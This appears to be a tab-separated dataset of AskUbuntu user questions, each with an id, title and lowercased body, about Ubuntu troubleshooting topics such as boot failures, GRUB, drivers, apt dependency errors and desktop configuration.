275791	ubuntu 12.04 freezes after booting to desktop	i ca n't find an answer to this problem . i have 12.04 installed , did an upgrade late one evening and when i rebooted next day ubuntu went as far as the desktop and then frize after about 10 or 20 seconds . alot of the advice i see on the forums assume a man has access to sudo and such tools . the only way i can successfully boot is using rescatux . i have tried a live cd with 11.04 and 9.sonmething but that juist threw me out to a initramfs screen . so as i understand it , the grub is working ok ( although i have a quiet splash , only ubuintu 12.04 installed ) . the kernel must be loading the modules because keybvoard , mouse , cd drive initially work through hard drive boot . using rescatux file manager , it shows that sda2 and sda10 are not mounted although all the other partitions are . in all i have sda1 ... sd10 my first question is where should my kernels be located ? and second how do i boot from older kernel ? and mainly does anyone genuinely know whats going on here ? i am not a computer wiz so please explain things without making assumptions ! !
275792	search external drive with gnome documents	is there any way for gnome documents to access and display documents ( html/docx/odt ) on an external usb hard drive ? i 'm running ubuntu gnome 13.04 in a virtual machine with the drive connected to it , but documents does n't seem to index the drive by default and there 's no visible option to make it search the drive . i 've checked system settings too . is gnome documents purely an online thing , and local stuff is handled with nautilus ? or is it more useful than meets the eye and i 'm just blind ? thanks
275794	how can i install piklab on 12.04 ?	i 'm trying to install piklab ide for microchip pic controllers programming but got stuck at an error message as below : -- could not find threads ( missing : threads_found ) cmake error at /usr/share/kde4/apps/cmake/modules/findqt4.cmake:420 ( file ) : file internal cmake error when trying to open file : /home/bnh/downloads/piklab-0.16.2/cmakefiles/cmaketmpqmake/tmp.pro for writing .
275795	customizing ubuntu to run from ram only , within grub options	i 'm interested in exactly this up , now let me explain what would like to do with this . i 'm preparing to buy 32gb of ram and already have quad core . my idea is to implement another option in grub that will do exactly this : on boot move whole / partition to ramfs , and boot ubuntu from there from time to time and also at shutdown signal , run rsync to `` backup '' data to hdd , of course in background . i already have ssd , and i think that rsync would n't take much to sync files . and also , loss of data is less important , except if it would be loss of more than 30 minutes active work , because uptime of my computer is almost 99.99 % , never turning off , so really do n't think that this could get some bigger problem than forced power off from hdd . / filesystem is not much big , around 7gb . now my question is : would this idea be `` cost effective '' , would rsync take much resources , and is somewhere already implemented some similar solution of this ?
275796	installing printer+scanner dell v105 on ubuntu 12.10	i recently got an old dell v105 printer and wanted to install it on ubuntu , however it could not find specific drivers and with the generic drivers ubuntu proposed , i can not scan any documents . so , are there any other drivers ( f.i . a similar printer from other mark eg lexmark ) which i could use for full operation ?
275808	grub customizer broken after changing grub backround image option	as you can see from the paste i have a dual boot laptop with win7 and ubuntu 12.10 . the grub broken after messing around with background picture with grub customizer.i did n't proceed to any change after that .
275809	calibrating clickpad	i just installed and set up ubuntu 12.10 on my new lenovo s206 with a synaptics clickpad . the problem is that clicking makes the cursor jump which is quite annoying at times . so i checked the fora for help . i found out that i can set the range : $ less /var/log/xorg.0.log | grep -i range $ synclient areabottomedge=1308 as well as the sensitivity of the clickpad : $ synclient | grep fingerlow $ synclient fingerlow=35 so far , so good . i played around a little and now the control is better , but not as good as i hoped . the perfect result , so i believe , could be achieved by linking both settings , i.e . if i could set an area on the clickpad where the sensitivity is different from the other area . this way i could move the mouse in one area and click in the other area of the clickpad . do you get my idea ? my question is : is it possible and if so , how ?
275810	how to install the apt-get command , when it 's itself been removed ?	i installed ubuntu 11.10 on my asus tf101 and wanted to strip it down a little bit removed the desktop environment and any application that comes with it . by doing this i accidentally removed removed apt-get ( do n't ask ) . now i want to reinstall it , but i ca n't find a single forum post or blog issuing this problem and i have no idea how to do it . can somebody please help me ? ( and please do n't ask why i do n't just install ubuntu server , installing ubuntu on this thing was a pain already . )
275814	there 's something about amd ati graphics	i 'm pretty sure that you have encountered many of these related issue topic . but i just want to get my curiosity untangled . i have followed the steps to install ati drivers based on section 2.1 in binarydriverhowto/ati it all seems fine ( based on the link revision ) with my fglrxinfo result output : display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6320 graphics opengl version string : 4.2.11903 compatibility profile context performance does n't differ much from the default open source that i 've previously used but , when i check my system info . it says that my graphic is graphics : vesa : wrestler which is the same value displayed when i was using the default open source before . q : so my question is . is this result expected and my driver is actually properly installed ? q : and if possible of explanation , why ? laptop info : asus k43u
275815	dvi-vga adapter problem	is it possible to add unsupported resolution when monitor is connected via dvi - > vga ( passive probably ) adapter ? the problem is that the monitor ( acer al1916w ) is reported as crt monitor , mainly because it connected indirectly to the gpu ( nvidia 9800gtx+ using driver v310.14 @ xubuntu 12.10 ) . i 've tried adding custom resolution with xrandr , but result was following : xrandr -- newmode `` 1680x1050_60.00 '' 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync xrandr -- addmode dvi-i-0 1680x1050_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 31 current serial number in output stream : 32 the persists on windows too , but it can be fixed by adding custom resolution from nvidia control panel . thanks in advance !
275820	apt behind proxy	i 've been trying to get a package manager to work behind our company proxy for a whole day now but without any luck . the proxy requires authentication which is my personal email address and password . i tried just about everything i could think of with no luck : from editing /etc/apt/apt.conf with acquire : :http : :proxy `` http : //user : pass @ proxy : port/ '' ; using simply my username , i tried escaping the `` @ '' but no luck . browser works fine but i do n't really need a browser . the system administrator wished me good luck and that pretty much sums up his assistance . so if anyone can help i would really really really appreciate it .
275826	how do i open a terminal in unity without window 's top bar ?	i would like ( in unity ) to open a terminal as startup application ; i created a simple script gnome-terminal -- profile=startup -- geometry 40x24+920+300 and put it in my startup applications . anyway i would like the terminal window to appear without its button 's bar ont the top of the window itself ( the one with the maximize , minimize and exit buttons ) . is that possible ? i can not find any way to do it on the internet .
275831	ubuntu 12.04 wo n't login , terminal works fine	i have n't found any links or responses to similar question that have helped . so let me describe my problems and what i have already done . i was working to connect my projector to my hp laptop running ubuntu 12.04 with my nvidia driver . i go it to work after a bit of tweaking . then i tried to change the resolution of the projector to make it more presentation friendly , which i did , but it also changed the screen resolution too which i did n't want . nvidia xserver setting panel would not show full settings , so i used gedit to change the xorg.conf file . i also removed my fingerprint gui because it did n't work correctly . i rebooted and when i tried to login the screen flashes , but goes right back to the login screen . guest login works . so i edited my profile to allow login without password . no joy . i reinstaled the policyki-1-gnome in terminal as well as purged xserver and reinstalled it . no joy . uninstalled the nvidia drivers and reinstalled . when trying to login to gui i did get an nvidia graphic show up before sending me back to the login . not sure what to do from here . i am not brand new to ubuntu , but i am not that experienced either . please help . thank you for your efforts in advance .
275833	how to get select statement choices into if statements ?	i 'm very new to programming on ubuntu . and i 'm trying to do a simple bash script . i have a select menu working but i want the choices made in that to go into a number of if statements , corresponding to the choices made . for example , here 's the pseudo code : choose from the following a ) b ) c ) a selected if a is selected then run this script fi if b selected then run this script fi if c selected then run this script how do i get the choice passed on into the relevant if statement ? all of this has to be run from the one script . this is probably very simple but i 'm new to this and struggling my way through it .
275835	openbox : launch a maximize application through ob menu	i am trying to configure my openbox 's menu.xml , and i would like to define a menu entry which launch a maximize application , for example firefox . < menu id= '' root-menu '' label= '' openbox 3 '' > < item label= '' firefox '' > < action name= '' execute '' > < execute > firefox < /execute > < /action > < action name= '' maximize '' / > < /item > < /menu > but it does n't work . after some test , i think that only the first action is execute . someone have a solution ?
275837	gui is not working after installation of glibc	gui is not working after installation of glibc in my pc i am using ubuntu 12.10 version
275838	copying two files using one command	copy two files from the /etc directory . they are cust_orders and cust_names . copy both files from the /etc directory to your home directory using one shell command with your home directory as the default directory that uses the fewest keystrokes possible .
275839	how to install ubuntu on a nokia n900	i read about ubuntu for phone and want to know if i can install ubuntu on an n900 because this one has debian i think .
275840	fingerprint reader in hp dv7	i am running ubuntu 12.10 , i recently installed `` fingerprint gui 1.05~pre2 '' on my hp dv7 notebook that has a built in fingerprint scanner . when launched fingerprint gui says `` no device found '' . what linux command do i use to try and find the technical information about my fingerprint scanner . thanks
275849	will nvidia gtx 650 work well on ubuntu 12.10 / 13.04 ?	i am going to buy a new graphics card and i am thinking about a nvidia gtx 650 . can anyone tell me if it has good driver support so that i can play games ( like tf2 ) without the opensource drivers ? ( as an alternative i am thinking about a amd 7750 , will it be better ? )
275861	problem installing python-dev	i am having trouble installing python-dev . it all started when i tried to install another python package and got the error : systemerror : can not compile 'python.h ' . perhaps you need to install python-dev . i tried sudo apt-get install python-dev but got the error : the following packages have unmet dependencies : python-dev : depends : python2.7-dev ( > = 2.7.3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . so then i tried sudo apt-get install python2.7-dev and got the error : the following packages have unmet dependencies : python2.7-dev : depends : python2.7 ( = 2.7.3-0ubuntu3 ) but 2.7.3-0ubuntu3.1 is to be installed depends : libpython2.7 ( = 2.7.3-0ubuntu3 ) but 2.7.3-0ubuntu3.1 is to be installed i have tried most everything in the post unmet dependencies . i am running ubuntu 12.04 and i have everything updated . i have done apt-get clean and apt-get autoclean . i have tried apt-get -f install and all variations on that theme . i have cleaned up my ppa . i even tried using aptitude , and though it did a lot of clean up , the result was the same . i really want to be able to install python-dev . how can i make this happen ? at this point , i am willing to consider extreme options , whatever they may be .
275864	how do i get a startech usb 3.0 to gigabit ethernet adapter working ?	i bought a startech usb 3.0 to gigabit ethernet adapter and looking for linux drivers . i did google search and did not come up with anything . startech.com has only windows drivers . any help on getting this up and running is greatly appreciated . my system : mac mini with refit and ubuntu 12.10 64-bit server .
275870	problems with left shift key	i have major ( at least as for my job as a coder ) hiccups with the lshift . i ca n't mark text in a textbox with leftshift and arrowkeys , or type a capital letter with it . what i can do , which i think eliminates the keyboard to be the source of the problem is : 1.alt+leftshift to switch language . 2.while leftshifting selecting text with the mouse in a web page . more info : in a keys thread elsewhere on askubuntu , someone suggested using xev , here is the output for right shift key : keypress event , serial 37 , synthetic no , window 0x2600001 , root 0x295 , subw 0x0 , time 49716012 , ( 103,94 ) , root : ( 306,867 ) , state 0x10 , keycode 62 ( keysym 0xffe2 , shift_r ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 37 , synthetic no , window 0x2600001 , root 0x295 , subw 0x0 , time 49716396 , ( 103,94 ) , root : ( 306,867 ) , state 0x11 , keycode 62 ( keysym 0xffe2 , shift_r ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false and here is for the left one : focusout event , serial 37 , synthetic no , window 0x2600001 , mode notifygrab , detail notifyancestor focusout event , serial 37 , synthetic no , window 0x2600001 , mode notifyungrab , detail notifypointer focusin event , serial 37 , synthetic no , window 0x2600001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 37 , synthetic no , window 0x0 , keys : 4294967189 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 all keys but super and lshift produce a keypress\release event , those two produce focusout\in then keymap notify , is this normal ? how should i go about tracing the cause and fixing it ?
275872	re-install ubuntu	i have installed in my laptop for some time now . while i was playing with partitions i accidentally ( think ) i destroyed the boot partition . now i can not open ubuntu since grub is lost . is there a way to reinstall ubuntu without losing the files i had ?
275878	how do i get my laptop speakers working ?	my laptop is a toshiba satellite a215-s7422 running ubuntu 12.04 . the command cat /proc/asound/card0/codec # * | grep codec gives the result codec : lsi id 1040 codec : realtek alc268 my headphones work , but speakers do not . i have tried several different model options in /etc/modprobe.d/alsa-base , but i 'm not sure if i got the right one since i could n't figure out how to find my sound card in the alsa documentation . i 've downloaded and compiled the most recent alsa drivers , as suggested here . when headphones are not plugged in the sound preferences screen shows speakers , which changes to and from headphones appropriately , so the system seems to be recognizing the internal sound card and speakers fine . the speaker is not muted in the system notification bar or in alsamixer . what else should i be doing to troubleshoot/fix the issue ? if alsa is not the easiest way to do this , i 'm open to answers that get my speakers working while maintaining the functionality of my headphones jack .
275879	what programming language would be best for ubuntu programming ?	hi i 've recently switched from windows 7 to ubuntu 12.10 and love the os . however i have had trouble deciding which programming language would be the all-around best for ubuntu programming . i have no problem learning a harder language , i already know a good amount of c++ and c # . i really like c # but i 've heard it does n't mix well with ubuntu . what would be the best-integrated languages for ubuntu , and good ides for them ?
275883	traditional search-as-you-type on newer nautilus versions	until now i was using a `` traditional '' version of nautilus : that that comes with ubuntu 10.10 . now i 'm using 3.6.3 , included with ubuntu 13.04 ( most likely any recent version is equivalent for the scope of my question , anyway ) . one major difference between the two is the search-as-you-type behavior : in classic versions of nautilus , when you typed an input , the file with the closest alphabetical match would become the selected one , the ellegible files/folders being restricted to the current directory . the new behavior is to perform an optionally-global search instead . can one configure nautilus to provide the previous functionality ?
275893	nautilus connect to server - can not reach filesystem root	using ubuntu-raring i connect via 'files/connect-to-server ' : ssh : //root @ myhost : mysshport/ connection works ok , but i am connected to '/root ' on the target system and can not reach the filesystem root ( i can not do a 'cd / ' via the ui ) how can i specify my connect string so that the mount point is the filesystem root ? ( note : when i do the same under win via bitvise client i get a selector to chose '/ ' or '/root ' so there does not seem to be a problem on the server side . ) thanks a lot for any hints !
275894	ubuntu 13.04 amd/intel hybrid graphics not working	with 12.10 i was able to use the solution provided in ubuntu 12.10 amd/intel hybrid graphics not working how to make it work in 13.04 raring ringtail ?
275898	i ca n't update my 12.04 lts for linux	if i try to update my 12.04 lts for linux ubuntu i get this message : could not initialise the package information an unresolvable problem occurred while initialising the package information . please report this bug for the 'update-manager ' package and try to include the following error message : 'e : malformed line 5 in source list /etc/apt/sources.list ( dist parse ) ' how can i solve this problem ? /etc/apt/sources.list deb http : //archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb http : //www.mozilla.org main deb-src http : //www.mozilla.org main deb http : //archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse
275902	dependency error while installing own cloud on ubuntu 12.04.2 lts	while truing to install owncloud client on ubuntu i am hiting the wall because of dependencies ! ! i googled it and checked everywhere but no remedy , can anyone help ? info : tried everything on here : http : //owncloud.org/sync-clients/ i am having following response from terminal : root @ c-thin : /home/c # sudo apt-get install owncloud-client reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : owncloud-client : depends : libqt4-core but it is not going to be installed depends : libqt4-gui but it is not going to be installed and this is my ubuntu version : root @ c-thin : /home/c # cat /etc/issue ubuntu 12.04.2 lts \n \l any help ? i have a i3 64 bit processor but my ubuntu is 32 bit
275903	how to automate system configuration after reinstalling	it is a bit boring to configure whole system every time i reinstall it . i am looking for a neat tool that can help me automate all actions , like : software installing software confguring user creation etc .
275905	skype segmentation fault ubuntu 13.04	skype ( from depots and website ) crashes with : erreur de segmentation ( core dumped ) tried to reinstall , no .skype in my /home maybe a clue : https : //bbs.archlinux.org/viewtopic.php ? id=154571 i 'll make some more tests when i have some time . thx
275911	installing scipy in ubuntu	so whenever i try pip install -u scikit-learn i get : importerror : libatlas.so.3gf : can not open shared object file : no such file or directory i made sure i have atlas-base in my /usr/lib/ dir . what am i doing wrong ? edit : clarifications , i 'm doing this in a virtualenv . edit 2 : someone suggested me to use sudo apt-get install python-scipy and this is what i get when i try to import : > > > import sklearn traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/local/lib/python2.7/dist-packages/scikit_learn-0.13-py2.7-linux-x86_64.egg/sklearn/__init__.py '' , line 32 , in < module > from .base import clone file `` /usr/local/lib/python2.7/dist-packages/scikit_learn-0.13-py2.7-linux-x86_64.egg/sklearn/base.py '' , line 9 , in < module > import numpy as np file `` /usr/lib/python2.7/dist-packages/numpy/__init__.py '' , line 137 , in < module > import add_newdocs file `` /usr/lib/python2.7/dist-packages/numpy/add_newdocs.py '' , line 9 , in < module > from numpy.lib import add_newdoc file `` /usr/lib/python2.7/dist-packages/numpy/lib/__init__.py '' , line 13 , in < module > from polynomial import * file `` /usr/lib/python2.7/dist-packages/numpy/lib/polynomial.py '' , line 17 , in < module > from numpy.linalg import eigvals , lstsq file `` /usr/lib/python2.7/dist-packages/numpy/linalg/__init__.py '' , line 48 , in < module > from linalg import * file `` /usr/lib/python2.7/dist-packages/numpy/linalg/linalg.py '' , line 23 , in < module > from numpy.linalg import lapack_lite importerror : /usr/lib/liblapack.so.3gf : undefined symbol : atl_chemv edit 3 : after fixing some dependencies issue with numpy , i now get : import fblas importerror : libatlas.so.3gf : can not open shared object file : no such file or directory
275917	recover important boot files ?	i deleted important boot files . how do i recover them . when i boot there is coming the error ntldr missing . http : //postimg.org/image/hj5fjdgyx/ i used the mashine in the beginning with two systems . windows on the 1st and ubuntu on the 2nd . later i deleted windows to get space . what can i do to recover ! ?
275919	execute shell script or command on idle time	i 'm searching for the possibility to execute a shell script or command based on idle time in the bash shell . as an example , if i 'm in a ssh session to a server of mine and after x minutes of inactivity in the terminal , i want a command to start a desired program like cmatrix , and when i come back and press a key i will get back where i left .
275920	why am i suddenly not a sudoer anymore ?	i booted up ubuntu 12.10 today , and when trying to sudo , i entered my password as usual but it had said i 'm not a sudoer . so i go and check my account under user accounts , and for some reason im now a standard user ? i tried re-adding myself to admin through recovery mode already , but it did n't work . edit : usermod command will not work . get the error : usermod : can not lock /etc/passwd ; try again later . edit 2 : thank you to all that helped ! your support is greatly appreciated !
275921	what algorithm is used by disk utility encryption ?	what encryption algorithm is used by the partition encryption function of disk utility ?
275923	does there exist a key binding configuration for sublime text ?	sublime text is very customizable , with all the shortcut options in one text file for you to edit . by default , a number of them do not work , mainly because the alt key escapes the program in unity . i would like to change it so that it works well with ubuntu , but i thought i 'd check if one exists already that someone has made . a quick google did n't find any . thanks
275925	how can i configure the terminator terminal to always be on top ?	i was able to set up the terminal to expand the whole monitor width but i would like for it to stay on the top of the screen even if i go to another workspace . if i hit f12 to drop it down when i am on a different workspace , it brings me back to the workspace i opened the terminal in and then puts the terminal window on the bottom of the monitor screen . below you will see my config : [ global_config ] enabled_plugins = launchpadcodeurlhandler , apturlhandler , launchpadbugurlhandler hide_from_taskbar = true always_on_top = true tab_position = bottom sticky = true [ keybindings ] hide_window = f12 [ profiles ] [ [ default ] ] background_darkness = 0.93 palette = `` # 000000 : # cc0000 : # 4e9a06 : # c4a000 : # 3465a4 : # 75507b : # 06989a : # d3d7cf : # 555753 : # ef2929 : # 8ae234 : # fce94f : # 729fcf : # ad7fa8 : # 34e2e2 : # eeeeec '' background_type = transparent foreground_color = `` # 00ff00 '' [ layouts ] [ [ default ] ] [ [ [ child0 ] ] ] position = 0:24 type = window order = 0 parent = `` '' size = 1700 , 464 [ [ [ terminal3 ] ] ] profile = default type = terminal order = 1 parent = child0 [ [ [ terminal2 ] ] ] profile = default type = terminal order = 0 parent = child0 [ plugins ] here is what happens via screen shot . i was on workspace 1 , then switched to workspace 2 , and hit f12 . as you can see , i was brought back to ws 1 with the terminal at the bottom .
275926	crash , abrupt heating , freezing of mouse , desktop graphics is degraded	now i have advance problem while booting ubuntu 12.04.2 lts , pointer of mouse is stuck and freeze at one point but the keys of keyboard is freezing and stuck at the middle of the screen and after some time the system have been crash and the fan of laptop is running very annoyingly . finally the system become heated ... ..and crashed please help me thanking you
275928	what does it mean that i have a green `` lv '' cicular logo/symbol on my mounted drive	i have a local mounted disk which bears my ubuntu 12.04 os . the disk icon on the unity dock has a green `` lv '' circular label on it . any ideas what this label means ..i can not find any documentation on this i am pasting a snapshot if it
275932	apt-get error : `` temporary failure resolving 'archive.ubuntu.com ' ``	root @ server1 : ~ # apt-get update err http : //archive.ubuntu.com lucid release.gpg temporary failure resolving 'archive.ubuntu.com' 0 % [ connecting to archive.ubuntu.com ] i ca n't get it work , any issues ? i use ubuntu 10.04 .
275940	how do i prevent these errors from showing up with gnome keyring ?	background trying to update a repository , after a fresh install of xubuntu 12.04 , using : git pull problem the following message appeared : warning : gnome-keyring : : could n't connect to : /tmp/keyring-*****/pkcs11 question how do you prevent the message from showing up ?
275945	how can i speed up a partition resize using gparted ?	shrinking and expanding partition using gparted in old versions of ubuntu was very fast . moving a partition was the only time-consuming task and the time depend on size of partition . in new versions of ubuntu , gparted seems to take a long time shrinking and expanding partitions . i guess it 's because it moves fragmented spaces and moving is very time-consuming , so the overall time of shrinking or expanding a partition is shrinking or expanding time plus time taken in moving fragmented spaces . that is huge if we are expanding or shrinking a big partition . to save time i want to ignore fragmented space . is there any way to shrink or expand a partition without taking care of small fragmentation using gparted or any other tool ?
275947	ubuntu wo n't recognize my video card and shows white screen with unintelligible characters	i just installed ubuntu to run side-by-side with a yet to be activated window 7 ultimate . i tried both of the 32-bit version of ubuntu and both say they do n't recognize my video card after the first reboot 12.04 allows me to run in low graphics mode ( 12.10 allows me to boot , but the screen turns white and has unintelligible characters ) . the error shows up with nice graphics , windows shows nice graphics , but when i try to go to the login , the screen turns white with black unintelligible characters . i 'm using a pci graphics card . windows shows in system under display a standard vga graphics adapter working and fully updated. , but under devices i see an nvidia nforce pci system management .
275951	get music on ipod touch ios 6.1.3	i just got my sister to use ubuntu , but now i have a really big problem , i promised her that syncing music would work with only drag and drop with rhythmbox , because that is how i do with my ipod nano which is old and stuff , but her ipod touch uses the newest release of ios and as i have been reading apple does what ever they can so syncing your ipod only works with itunes . now syncing her ipod does n't work . has anyone got an ipod touch to work with ubuntu ? any other software than rhythmbox would also be fine or even some ugly and long way through the terminal would also be fine . i am willing to do anything to stop her to use windows again .
275953	saving user settings in qml/js	i 'm working on a small game and i 'd like to know how can i write/read a user settings file in ubuntu touch ?
275954	listitem.valueselector has some sort of onselectedindexchange ?	i 'm writing a small game and in the settings it uses a listitem.valueselector in the settings , i 'd like to if it 's possible attach some event on it like with a mouse area , ie : mousearea { anchors.fill : parent onclicked : { //do something when clicked } } an event that triggers when the selectedindex : property in changes a listitem.valueselector , any help ?
275955	how can i make nautilus sorting ignore the word `` the '' or `` a '' at the beginning of file and folder names ?	i have a rather large library of media and it gets annoying looking for something when i forget that the `` official '' name of the movie , artist , song , etc begins with the words `` the '' or `` a '' . so , for example , if i have a file like : the lord of the rings- fellowship of the ring.mp4 i would like it to be sorted by skipping the word `` the '' in this title , so the file would be sorted like the following : lord of the rings- fellowship of the ring.mp4 however , i do n't want to remove the word `` the '' in this instance from the name . basically , i 'd like the sorting found in finder in os x . is this possible ? i 'd only want it to affect nautilus . if i run ls for example from cli , i do n't want that to ignore the word `` the '' or `` a '' . i 'm running ubuntu 12.04.2 lts right now ( nautilus version 3.4.2 ) .
275959	computer shut down during resizing of drive , stuck !	basically i was trying to resize my drive since i was low on disk space for the ubuntu os using a wubi of ubuntu 12.10 ( i believe that or 12.04 ) . but my computer shut down in the process . now when i try to access my personal account the application bar ( left side ) does n't show up , the status bar ( top ) is gone , but the terminal works . i have tried to go through using cd but it says i do n't have permission , after using sudo it still does n't work . i 'm sure the data is still there since in the terminal i used ls and it shows all the files even after the shutdown . i tried downloading and using gparted but the recover data thing came up with an error . oddly enough when i access the guest account everything seems normal except i do n't have root privileges ( so i ca n't alter anything from there ) . when i tried to access firefox through the terminal nothing came up and only more error messages popped up than usual . when i used any other application it would n't pop up with anything only showing more errors and one on my spotify application that said this process is n't supposed to happen . i know there 's no restore point option in ubuntu after googling any possible solutions out there . i am very new to ubuntu so if anyone could help me , please !
275960	12.10 : can log into terminal , but can not log into desktop	i just installed ubuntu and after some struggles i have a gui ! however , on startup , it wo n't accept my password . some more info : i set it to `` login automatically '' during install . during the install i defined 3 things : name ( first last ) , login ( one short string ) , and password . in the terminal , i can log in , and it asks for 2 things : first login , then password . when the gui starts up , it displays my first and last name ( no mention of my login ) , and asks for a password . it wo n't accept the one i 've been using . if i switch to the terminal with ctrl-alt-f1 , i can log in , but when i hit ctrl-alt-f7 , it 's still waiting for a password . it wo n't accept a blank . the other options , aside from my name , are guest session and remote login . interesting behavior to note : if enter something wrong , i get a spinning ball of dots , and the message `` invalid password . please try again . '' however , if i use the password i 've been using in the terminal , it goes black , appears to be moving on , and then returns as it was , asking for password . so this problem seems deeper than a non-recognized password . something else to note , which may/may not be related : if i choose guest session , after a few seconds the screen gets corrupted and is unusable . any ideas ?
275962	how can i change the default name that kate and gedit give to new documents ?	when you create a new file in kate or gedit they name them like `` untitled1 '' or `` unsaved document 1 '' . how can you change this to some other string $ n pattern of your choice ?
275963	how to see available commands that end with a certain string ?	if you start typing and pressing tab the console tries to expand and show all commands , functions and executable scripts that begin with what you have started to write . is there a way to see which commands the typed string anywhere in their names ? not necessarily with tab completion , but with some small function or script . i may remember a command that has font in its name , but not in the beginning . how to make it show mkfontdir and all the others ? or i may have a script with font somewhere in the name but not in the beginning ( like my-fonts.py ) .
275964	booting stuck at `` loading initial ram disk ... ''	i just installed ubuntu on my system . my system have uefi . no secure boot enabled . i ran the installation dvd in efi mode . after installation , everything works fine . but if i update the kernel or do some other changes like installing graphics drivers , the boot screen gets stuck . the os wo n't load . when checking the bios boot menu , i found two ubuntu efi entries . one of them work and the other does n't . whats really going on in my system ? please help ! ps : i use ubuntu 12.10 64bit version .
275965	how to list all variables names and their current values ?	including not only $ home , $ pwd etc but any other you have defined .
275967	dvd drive not reading dvd 's	i have done the regionset thing , but the drive doesnt find a dvd when i do . i have added the css file i have tried manually mounting the drive and get failed to mount '/dev/sr0 ' to '/media/apt/' e : unable to locate any package files , perhaps this is not a debian disc or the wrong architecture ? i have a brand new hp probook 4430s . i wiped windows and installed ubuntu . some dvd 's have played , and some havent and there seems no rhyme or reason to play or not . ( i still have a list of dvd_css 's in the .dvdcss file . ) i have read pages and pages of helps trying to find the answer and as yet no answer has fixed my problem *-cdrom description : dvd-ram writer product : dvd rw ad-7711h vendor : hp physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom2 logical name : /dev/cdrw2 logical name : /dev/dvd2 logical name : /dev/dvdrw2 logical name : /dev/sr0 version : 1.82 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc there was a disk ( rv with robin williams ) in the drive at the time . using vlc , i set it to open /dev/dvd2 ( as thats the address of the drive it seems ) instead of the default /dev/dvd and got this error : playback failure : dvdread could not open the disc `` /dev/dvd2 '' . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///dev/dvd2 ' . check the log for details .
275968	ubuntu wo n't load , shows sceen with gnu grub	i downloaded ubuntu 12.10 to run alongside windows , and when i start the computer up , i get the `` please select operating system '' screen , and i choose ubuntu . however , i do n't see anything that looks like ubuntu , ( or at least not what it was like in the online tour ) and i get a screen that shows something like : try ( h0,0 ) : ntfs5 : for a split second , then shows : fă˘~ â˛0000h for another second , then it shows : gnu grub 2.00-7ubuntu4 minimal bash-like editing is supported . for the first word tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > _ i am new to ubuntu , ( and therefore have not gone on it ) and am not knowledgeable in code , so i do n't know what i need to do . i have checked around , and i think that i am missing something , possibly grub2 . if so , how do i get it ?
275969	ubuntu install on nexus 7 hangs on noting disapperance of ubiquity	i 'm following the instructions on https : //wiki.ubuntu.com/nexus7/installation using the desktop installer to get ubuntu on to my nexus 7 , but it gets stuck on first boot on 'applying changes ' > noting disappearance of ubiquity . when i click on 'details ' it 's stuck on 'purging configuration files for ubiquity ... ' . it 's sat there for an hour so far . i have switched usb cable and reinstalled stock android ( successfully ) and tried again as suggested on the wiki page . i have also tried the manual installing instructions and get a failed ( remote : ( invalidsize ) ) error . any ideas where i 'm doing wrong ?
275973	how can i colorize code sent to stdout ?	most text editors - vim , emacs , kate , gedit - have colorizers , so that , depending on the language you 're programming in , it will color the text differently . is there a way to do that for code sent to the stdout ? so that commands like those will colorize the whole output according to the language of the file ( from extension or magic ) : cat my-script.py or head -n 15 my-script.lua
275976	how to protecting cd command to deal with parentheses ?	i asked here how to make cd protect spaces . tab completion is great , but sometimes you paste the path from the clipboard so this is useful . the solution breaks with parentheses however . no matter how you try to escape and protect the input it always returns : bash : syntax error near unexpected token ` ( ' is there some way to have it also deal with parentheses ? what i want is that when i enter this , it works : cd my path with spaces ( and parentheses )
275981	rsync how do i sync only existing target files	i 'd like to know how i can sync only existing files and directories in the target directory . for example , if i have in the source a\ , b\ , b.txt , a.txt and in the target a\ , a.txt then i would like rsync to update a\ ( including all files in it , on the source ) and a.txt but ignore copying b\ and b.txt . thanks for the inputs .
275996	unable to get the grub even after boot-repair is performed	i have hp pavillion sleekbook 14 with windows 8 . i installed ubuntu only to find out that it cant be booted . i performed boot-repair as others in this forum have did . the boot-repair was successful . but in the end it showed me a message , '' please do not forget to make your bios boot on sda2/efi/ubuntu/shimx64.efi file ! '' and my url is http : //paste.ubuntu.com/5660106/ i dont know what that means . i think i ll be able to get the grub when i perform the above action . can anyone help me to boot bios on that shimx64.efi file pls ! !
